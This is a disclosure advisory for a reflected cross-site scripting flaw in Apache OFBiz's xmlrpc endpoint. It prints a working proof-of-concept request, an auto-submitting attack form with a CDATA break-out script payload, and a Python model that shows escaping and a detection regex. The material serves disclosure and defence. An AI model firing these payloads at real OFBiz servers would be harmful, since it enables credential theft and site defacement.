Apache OFBiz is vulnerable to Reflected Cross-Site Scripting through a POST request.
The /webtools/control/xmlrpc endpoint exposes some unauthenticated services, such as ping. This service can be used to reflect arbitrary data back to the client, resulting in a Cross-Site Scripting issue:
POST /webtools/control/xmlrpc?echo=foo HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: https://localhost:8443
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/xml
Content-Length: 140

]]></string><a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script><string><![CDATA[
A POST-based XSS issue can be triggered by luring the victim into visiting a malicious page, e.g.:
<html>
  <body>
    <form name=TheForm action=http://localhost:8080/webtools/control/xmlrpc?echo=foo method=post enctype="text/plain">
      <input type=hidden name=foo value="]]></string><a:script xmlns:a='http://www.w3.org/1999/xhtml'>alert(document.domain)</a:script><string><![CDATA[" >
    </form>
    <script>
      document.TheForm.submit();
    </script>
  </body>
</html>
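The request above works because the reflected value is emitted inside a CDATA section of the XML response, so a literal `]]>` ends that section and whatever follows is parsed as markup (here an XHTML script element the browser executes). The following is an added example, not OFBiz code: it models that behaviour with an assumed response layout, shows the CDATA-safe escaping that prevents the break-out, and a simple check that flags request values carrying the break-out signature.

```python
import re
import xml.etree.ElementTree as ET

# Constructed from the advisory's request body: the value the xmlrpc handler
# reflects. It closes the CDATA section, injects an XHTML script element and
# reopens a CDATA section so the rest of the response still parses.
PAYLOAD = (']]></string><a:script xmlns:a="http://www.w3.org/1999/xhtml">'
           'alert(document.domain)</a:script><string><![CDATA[')

def reflect_unsafe(value):
    """Assumed model of the vulnerable handler: untrusted text is written
    verbatim inside a CDATA section of the XML response."""
    return '<response><string><![CDATA[' + value + ']]></string></response>'

def cdata_escape(value):
    """Make untrusted text safe for a CDATA section. A literal ']]>' is split
    into ']]]]><![CDATA[>': the current section ends after ']]', a new one opens,
    and the '>' lands inside it, so the text can never terminate the section."""
    return value.replace(']]>', ']]]]><![CDATA[>')

def reflect_safe(value):
    """Hardened form of reflect_unsafe: same response layout, escaped content."""
    return '<response><string><![CDATA[' + cdata_escape(value) + ']]></string></response>'

def element_tags(xml_text):
    """Tags of the elements the parser actually sees under the response root.
    Anything other than a single 'string' means the input broke out of CDATA."""
    return [child.tag for child in ET.fromstring(xml_text)]

def reflected_text(xml_text):
    """Text recovered from the <string> element; the parser joins adjacent
    CDATA sections, so correctly escaped input round-trips unchanged."""
    return ET.fromstring(xml_text).find('string').text

# Detection: a CDATA terminator followed by a tag inside a request parameter
# is the signature of this break-out and has no legitimate use in the echo service.
CDATA_BREAK = re.compile(r'\]\]>\s*<')

def flags_cdata_break(value):
    return bool(CDATA_BREAK.search(value))

if __name__ == '__main__':
    print(element_tags(reflect_unsafe(PAYLOAD)))   # a script element appears
    print(element_tags(reflect_safe(PAYLOAD)))     # only ['string']
    print(reflected_text(reflect_safe(PAYLOAD)) == PAYLOAD)
    print(flags_cdata_break(PAYLOAD))
```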
This issue may lead to a variety of attacks, from page defacement to stealing user or admin credentials. In conjunction with any SSTI issue, it can be escalated to Remote Code Execution.
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
You can contact the GHSL team at email@example.com; please include the GHSL-2020-068 identifier in any communication regarding this issue.